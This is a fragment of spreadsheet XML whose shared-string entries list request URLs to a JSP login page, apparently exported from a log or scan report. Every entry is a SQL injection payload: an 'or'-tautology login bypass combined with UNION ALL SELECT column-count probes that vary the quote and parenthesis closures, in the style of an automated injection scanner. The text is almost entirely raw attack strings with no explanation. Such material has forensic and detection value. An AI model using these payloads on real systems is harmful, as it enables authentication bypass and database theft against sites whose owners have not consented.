    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036,5036#and((("kqbo"="kqbo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915#and((("kwnx"="kwnx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983,9983#and"kekn"="kekn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246,7246#and"ttfp"="ttfp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117,3117#and"bqdx"="bqdx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166,3166#and"crod"="crod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519#and"zsay"="zsay&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137#and"idqx"="idqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771,6771#and"hmxy"="hmxy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387,1387#and"mkva"="mkva&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832,9832#and"rguw"="rguw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063#and"dqjw"="dqjw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362,1362#and("zbzd"like"zbzd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426#and("eckv"like"eckv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625#and("fbad"like"fbad&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571#and("ghti"like"ghti&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466#and("huwx"like"huwx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872,8872#and("zgsu"like"zgsu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127,4127#and("nbos"like"nbos&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625,4625#and("ldyr"like"ldyr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487,3487#and("bbaa"like"bbaa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791,3791#and("ohvd"like"ohvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826#and(("noue"like"noue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757#and(("aesz"like"aesz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465#and(("zuks"like"zuks&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182,7182#and(("tgoy"like"tgoy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796,2796#and(("vovw"like"vovw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172,6172#and(("yxjn"like"yxjn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105#and(("yqlr"like"yqlr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763,8763#and(("mgdf"like"mgdf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761,1761#and(("tutz"like"tutz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166#and(("mlvq"like"mlvq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243#and((("ooao"like"ooao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265,8265#and((("xnml"like"xnml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552#and((("hizo"like"hizo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315#and((("jwhk"like"jwhk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569#and((("gtll"like"gtll&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645,4645#and((("kfqi"like"kfqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626,9626#and((("uhyj"like"uhyj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126,3126#and((("zmwd"like"zmwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883,8883#and((("wrpg"like"wrpg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270#and((("xkiz"like"xkiz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448,1448#and"nuhg"like"nuhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048#and"ihcz"like"ihcz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189#and"bsmg"like"bsmg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735,6735#and"zmlf"like"zmlf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366,2366#and"krfr"like"krfr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433,5433#and"fksq"like"fksq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018,5018#and"vxum"like"vxum&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306#and"icnj"like"icnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643#and"xnfp"like"xnfp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236#and"bgeu"like"bgeu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#and(2713=2713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#and(5675=5675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#and(7171=7171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#and(1671=1671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#and(8491=8491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#and(3188=3188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#and(4102=4102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#and(8217=8217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,null#and(4261=4261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,null,null#and(3292=3292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#and((9695=9695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#and((1582=1582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#and((6734=6734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#and((1367=1367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#and((9440=9440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#and((1207=1207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,null#and((8808=8808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,null,null#and((7924=7924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,null,null,null#and((6499=6499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,null,null,null,null#and((6268=6268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#and(((3358=3358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#and(((9702=9702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#and(((718=718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#and(((9200=9200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#and(((6701=6701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#and(((6007=6007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,null#and(((6140=6140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,null,null#and(((2592=2592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,null,null,null#and(((3531=3531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,null,null,null,null#and(((2085=2085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,null,null,null,null#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#and('sulg'='sulg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#and('dope'='dope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#and('budo'='budo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#and('zdby'='zdby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#and('lado'='lado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#and('ultm'='ultm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#and('wbea'='wbea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#and('wdgr'='wdgr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#and('zhex'='zhex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,null#and('shqu'='shqu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#and(('hqzn'='hqzn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#and(('bfok'='bfok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#and(('nbko'='nbko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#and(('ypir'='ypir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#and(('fxyn'='fxyn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#and(('ulmq'='ulmq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#and(('lkyw'='lkyw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#and(('zskv'='zskv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,null#and(('sntk'='sntk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,null,null#and(('swnf'='swnf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#and((('imeg'='imeg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#and((('puyo'='puyo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#and((('llcv'='llcv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#and((('ydjv'='ydjv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#and((('xvsl'='xvsl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#and((('cewy'='cewy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#and((('jcqm'='jcqm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#and((('gmox'='gmox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,null#and((('wfff'='wfff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,null,null#and((('irze'='irze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#and'trmr'='trmr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#and'pkzt'='pkzt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#and'odvc'='odvc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#and'laio'='laio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#and'rsxn'='rsxn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#and'broj'='broj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#and'rsqf'='rsqf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#and'utql'='utql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#and'ngia'='ngia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,null#and'haru'='haru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#and('ztlx'like'ztlx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#and('vnhd'like'vnhd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#and('runh'like'runh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#and('lwte'like'lwte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#and('aweb'like'aweb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#and('shja'like'shja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#and('huao'like'huao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#and('psyf'like'psyf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#and('ouhk'like'ouhk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,null#and('fqid'like'fqid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#and(('ggrm'like'ggrm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#and(('mhrg'like'mhrg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#and(('tnzx'like'tnzx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#and(('izsc'like'izsc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#and(('kora'like'kora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#and(('cckr'like'cckr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#and(('gnli'like'gnli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#and(('nrik'like'nrik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,null#and(('gnph'like'gnph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,null,null#and(('jnxt'like'jnxt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#and((('azaw'like'azaw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#and((('fmny'like'fmny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#and((('dkoa'like'dkoa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#and((('zvqk'like'zvqk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#and((('pyij'like'pyij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#and((('yzrg'like'yzrg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#and((('enze'like'enze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#and((('erxp'like'erxp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,null#and((('ctob'like'ctob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,null,null#and((('ascy'like'ascy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#and'pftj'like'pftj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#and'tqvs'like'tqvs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#and'rraz'like'rraz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#and'nhsw'like'nhsw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#and'ubey'like'ubey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#and'kyga'like'kyga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#and'efzi'like'efzi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#and'mbwy'like'mbwy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#and'whhr'like'whhr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,null#and'vtvh'like'vtvh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#and("vfmd"="vfmd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#and("idto"="idto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#and("qtfl"="qtfl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#and("yaae"="yaae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#and("wkmo"="wkmo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#and("rhaz"="rhaz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#and("kqcs"="kqc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#and("criy"="criy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,null#and("vhum"="vhum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,null,null#and("rbih"="rbih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#and(("dpzn"="dpzn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#and(("pdtl"="pdtl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#and(("clwu"="clwu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#and(("fkas"="fkas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#and(("neva"="neva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#and(("pdvo"="pdvo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#and(("fxyh"="fxyh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#and(("swok"="swok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,null#and(("jsdy"="jsdy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,null,null#and(("zmuq"="zmuq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#and((("buoo"="buoo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#and((("smog"="smog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#and((("ivgg"="ivgg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#and((("wxzz"="wxzz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#and((("ilpp"="ilpp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#and((("olpv"="olpv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#and((("wfca"="wfca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#and((("uihc"="uihc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,null#and((("maoh"="maoh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,null,null#and((("utbj"="utbj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#and"qndu"="qndu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#and"fqlx"="fqlx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#and"nzbm"="nzbm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#and"hnsj"="hnsj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#and"urbn"="urbn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#and"cotp"="cotp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#and"kfaq"="kfaq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#and"hjtz"="hjtz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#and"pgnt"="pgnt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,null#and"btwd"="btwd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#and("notb"like"notb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#and("vihn"like"vihn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#and("xhat"like"xhat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#and("thqj"like"thqj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#and("pchn"like"pchn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#and("dorr"like"dorr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#and("xulr"like"xulr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#and("czfw"like"czfw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,null#and("ryen"like"ryen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,null,null#and("fwld"like"fwld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#and(("xjdr"like"xjdr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#and(("zena"like"zena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#and(("znoe"like"znoe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#and(("sdsk"like"sdsk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#and(("fwjo"like"fwjo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#and(("jhkn"like"jhkn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#and(("tdnm"like"tdnm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#and(("bnkg"like"bnkg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,null#and(("shvg"like"shvg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,null,null#and(("uahb"like"uahb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#and((("cszz"like"cszz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#and((("cfbp"like"cfbp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#and((("uqfw"like"uqfw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#and((("uwpz"like"uwpz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#and((("fmfx"like"fmfx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#and((("evro"like"evro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#and((("bwzu"like"bwzu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#and((("zhoc"like"zhoc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,null#and((("jrct"like"jrct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,null,null#and((("wlpe"like"wlpe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#and"pwzq"like"pwzq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#and"kisv"like"kisv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#and"qlkw"like"qlkw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#and"hnfu"like"hnfu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#and"wrsj"like"wrsj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#and"auhs"like"auhs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#and"erhc"like"erhc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#and"dahv"like"dahv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#and"rltb"like"rltb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,null#and"kgst"like"kgst&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260,260#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735,3735#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755,2755#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641,6641#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685,9685#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169,8169#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716,8716#&amp;modo=entrar</t>
  </si>
  <si>
